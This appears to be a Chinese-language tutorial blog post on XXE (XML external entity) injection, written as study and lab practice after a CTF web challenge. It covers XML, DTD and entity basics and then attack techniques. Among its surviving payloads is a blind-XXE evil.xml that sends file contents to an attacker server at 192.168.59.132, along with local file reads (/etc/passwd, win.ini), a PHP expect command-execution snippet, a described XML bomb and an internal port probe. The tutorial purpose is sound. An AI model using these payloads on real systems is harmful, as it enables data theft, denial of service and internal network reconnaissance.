前言:
最近做了一道WEB题,涉及到XML外部实体注入(即XXE漏洞),恰好也没有系统的学习过,这次就了解一些其攻击方式包含的原理,并通过WEB题来实战一番。
0x01:简单了解XML
1 | XML 指可扩展标记语言(EXtensible Markup Language) |
XML的优点:
xml
是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传输,而且xml有助于在服务器之间穿梭结构化数据,方便开发人员控制数据的存储和传输。
XML的特点及作用:
特点:
1 | 1. xml与操作系统、编程语言的开发平台都无关 |
作用:
1 | 1. 配置应用程序和网站 |
而且在配置文件里边所有的配置文件都是以XMl
的格式来编写的,跨平台进行数据交互,它可以跨操作系统,也可以跨编程语言的平台,所以可以看出XML是非常方便的,应用的范围也很广,但如果存在漏洞,那危害就不言而喻了。
XML语法、结构与实体引用:
语法:1
2
3
4
51.XML元素都必须有关闭标签。
2.XML 标签对大小写敏感。
3.XML 必须正确地嵌套。
4.XML 文档必须有根元素。
5.XML 的属性值须加引号。
结构:
1 | 1.XML 文档声明,在文档的第一行 |
如:
实体引用:
在 XML 中一些字符拥有特殊的意义,如果把字符 <
放在 XML 元素中,便会发生错误,这是因为解析器会把它当作新元素的开始。
例如:
1 | <message>hello < world</message> |
便会报错,为了避免这些错误,可以实体引用来代替 <
字符
1 | <message>hello < world</message> |
XML
中,有 5 个预定义的实体引用,分别为:
上面提到XML 文档类型定义,即DTD,XXE 漏洞所在的地方,为什么这个地方会产生XXE漏洞那,不要着急,先来了解一下DTD。
0x02 了解DTD:
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。
优点:1
2有了DTD,每个XML文件可以携带一个自身格式的描述。
有了DTD,不同组织的人可以使用一个通用DTD来交换数据。
DTD文档的三种应用形式:
1.内部DTD文档
1 |
2.外部DTD文档
1 |
3.内外部DTD文档结合
1 |
例如:
上半部分是内部DTD文档,下半部分是XML文档#PCDATA(Parsed Character Data)
,代表的是可解析的字符数据,即字符串
下面再举一个外部DTD文档的例子:
新建一个DTD文档,文件名叫LOL.dtd
,内容如下:
1 |
|
再新建一个XML文档,加入外部DTD文件的名称(同一个路径下只给出文件名即可)
1 |
|
具体例子可以参考
有效的XML: DTD(文档类型定义)介绍
DTD元素
在一个 DTD 中,元素通过元素声明来进行声明。
其中可以看到一些PCDATA或是CDATA,这里简单叙述一下:
PCDATA:
PCDATA
的意思是被解析的字符数据(parsed character data)
。可以把字符数据想象为 XML 元素的开始标签与结束标签之间的文本。PCDATA
是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理,而实体会被展开。但是,被解析的字符数据不应当包含任何 & < >
字符;需要使用 & < >
实体来分别替换它们。
CDATA:CDATA
的意思是字符数据(character data)
。CDATA
是不会被解析器解析的文本。在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开。
简单比较直观的就是这样的一种解释:PCDATA
表示已解析的字符数据。CDATA
是不通过解析器进行解析的文本,文本中的标签不被看作标记。CDATA表示里面是什么数据XML都不会解析
DTD-实体
1 | 实体是用于定义引用普通文本或特殊字符的快捷方式的变量。 |
内部实体
1 | <!ENTITY 实体名称 "实体的值"> |
一个实体由三部分构成: &
符号, 一个实体名称, 以及一个分号 (;)
例如:
1 | <!DOCTYPE foo [<!ELEMENT foo ANY > |
外部实体
XML
中对数据的引用称为实体,实体中有一类叫外部实体,用来引入外部资源,有SYSTEM
和PUBLIC
两个关键字,表示实体来自本地计算机还是公共计算机,外部实体的引用可以利用如下协议
1 | file:///path/to/file.ext |
1 | <!ENTITY 实体名称 SYSTEM "URL"> |
参数实体
1 | <!ENTITY %实体名称 "值"> |
例如:
1 |
|
外部evil.dtd
中的内容
1 | <!ENTITY evil SYSTEM “file:///c:/windows/win.ini” > |
外部实体可支持http
、file
等协议,所以就有可能通过引用外部实体进行远程文件读取
1 |
|
上述代码中,XML的外部实体xxe
被赋予的值为:file:///etc/passwd
当解析xml文档是,&xxe;
会被替换为file:///ect/passwd
的内容,导致敏感信息泄露
(例子参考大师傅博客XXE漏洞学习)
可能这些知识点会枯燥无味,但XXE
主要是利用了DTD引用外部实体
而导致的漏洞,所以了解还是很有必要的,接下来就要进入正题咯。
0x02:一步一步接近XXE漏洞
漏洞危害:
如果开发人员在开发时允许引用外部实体时,恶意用户便会利用这一漏洞构造恶意语句,从而引发文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等,可见其危害之大。
XXE常见的几种攻击方式
(这张图其实就很好的解释了如何利用XXE进行攻击)
XXE
和SQL
注入的攻击方法也有一点相似,就是有回显和没有回显
有回显的情况可以直接在页面中看到payload
的执行结果或现象,无回显的情况又称为blind xxe
(类似于布尔盲注、时间盲注),可以使用外带数据(OOB)通道提取数据
下面就通过构造一些简单的环境来了解一下各个攻击方法究竟是如何利用的
一、读取任意文件(有回显与无回显)
测试源码:
1 | <?php |
构造payload:
1 | <?xml version="1.0" enyoucoding="utf-8"?> |
将payload进行url编码,传入即可读取任意文件
根据结果我们可以看到通过构造内部实体的payload,在 xml
中 &file ;
已经变成了外部文件1.txt
中内容,导致敏感信息泄露。
下面通过靶场来进行练习有回显读取文件和无回显读取文件,抓包发现通过XML进行传输数据
发现响应包的内容为usrename
构造payload
1 |
|
将file:///d:/1.txt
改为file:///c:/windows/win.ini
等其他重要文件都是可以读取的,也可以读取PHP
文件等。
解码后即是PHP代码的内容
上面利用内部实体和外部实体分别构造了不同的payload,而且我们发现这个靶场是有回显的,通过回显的位置我们观察到了响应包的内容,以此为依据进行构造payload
,从而达到任意读取文件的目的。
但这种攻击方式属于传统的XXE,攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,那如果对方服务器没有回显应该如何进行注入
下面就将源码修改下,将输出代码和报错信息禁掉,改成无回显
再次进行注入,发现已经没有回显内容
下面就利用这个靶场来练习无回显的文件读取,遇到无回显这种情况,可以通过Blind XXE
方法加上外带数据通道来提取数据,先使用php://filter
获取目标文件的内容,然后将内容以http
请求发送到接受数据的服务器来读取数据。虽然无法直接查看文件内容,但我们仍然可以使用易受攻击的服务器作为代理,在外部网络上执行扫描以及代码。
这里我使用的攻击服务器地址为192.168.59.132
,构造出如下payload:
1 |
evil.xml1
2<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.59.132/?content=%file;'>"> %payload;
//%号要进行实体编码成%
evil.xml放在攻击服务器的web目录下进行访问
这里如果不是管理员,需要更改一下对目录的管理权限等,这里偷个懒权限全调至最高
至此准备工作完毕,下面就监控下apache
的访问日志
请求几次,发现
接下来就base64
解码即可
实验完成,但为什么那,简单的解释下:
从 payload
中能看到 连续调用了三个参数实体 %dtd;%file;%send;
,这就是利用先后顺序,%dtd
先调用,调用后请求远程服务器(攻击服务器)上的evil.xml
,类似于将evil.xml
包含进来,然后再调用 evil.xml
中的 %file
, %file
就会去获取对方服务器上面的敏感文件,然后将 %file
的结果填入到 %send
,再调用 %send;
把我们的读取到的数据发送到我们的远程主机上,这样就实现了外带数据的效果,完美的解决了 XXE
无回显的问题。
无回显的构造方法也有几种固定的模板,如:
一、第一种命名实体+外部实体+参数实体写法
1 |
|
evil.xml
文件内容为
1 | <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:88%file;'>"> |
二、第二种命名实体+外部实体+参数实体写法
1 |
|
evil.xml
文件内容为:
1 | <!ENTITY % payload "<!ENTITY % send SYSTEM 'http://localhost:88/?content=%file;'>"> %payload; |
二、DOS攻击(Denial of service:拒绝服务)
几乎所有可以控制服务器资源利用的东西,都可用于制造DOS攻击。通过XML外部实体注入,攻击者可以发送任意的HTTP
请求,因为解析器会解析文档中的所有实体,所以如果实体声明层层嵌套的话,在一定数量上可以对服务器器造成DoS
。
例如常见的XML炸弹
1 |
|
XML解析器尝试解析该文件时,由于DTD的定义指数级展开(即递归引用),lol
实体具体还有 “lol”
字符串,然后一个 lol2
实体引用了 10 次 lol
实体,一个 lol3
实体引用了 10 次 lol2
实体,此时一个 lol3
实体就含有 10^2 个 “lol”
了,以此类推,lol9 实体含有 10^8 个 “lol”
字符串,最后再引用lol9
。 所以这个1K不到的文件经过解析后会占用到3G
的内存,可见有多恐怖,不过现代的服务器软硬件大多已经抵御了此类攻击。
防御XML
炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。
三、命令执行
在php环境下,xml命令执行需要php装有expect
扩展,但该扩展默认没有安装,所以一般来说命令执行是比较难利用,但不排除有幸运的情况咯,这里就搬一下大师傅的代码以供参考:1
2
3
4
5
6
7
8
9
10
11<?php
$xml = <<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "except://ls">
]>
<x>&f;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data);
?>
四、内网探测
1 | <?xml version="1.0" encoding="utf-8"?> |
后面的403禁止就很明显的说明了该端口是开放状态的
如果这里再尝试一下没有开放的端口,发现
因此也可以利用这种方法来探测内网端口以及对内网进行攻击等
总结:
通过这次学习,有get的新的知识,继续努力学习吧!
参考博客:
XXE漏洞攻防原理
XXE漏洞
推荐靶场:
phpaudit-XXE
xxe-lab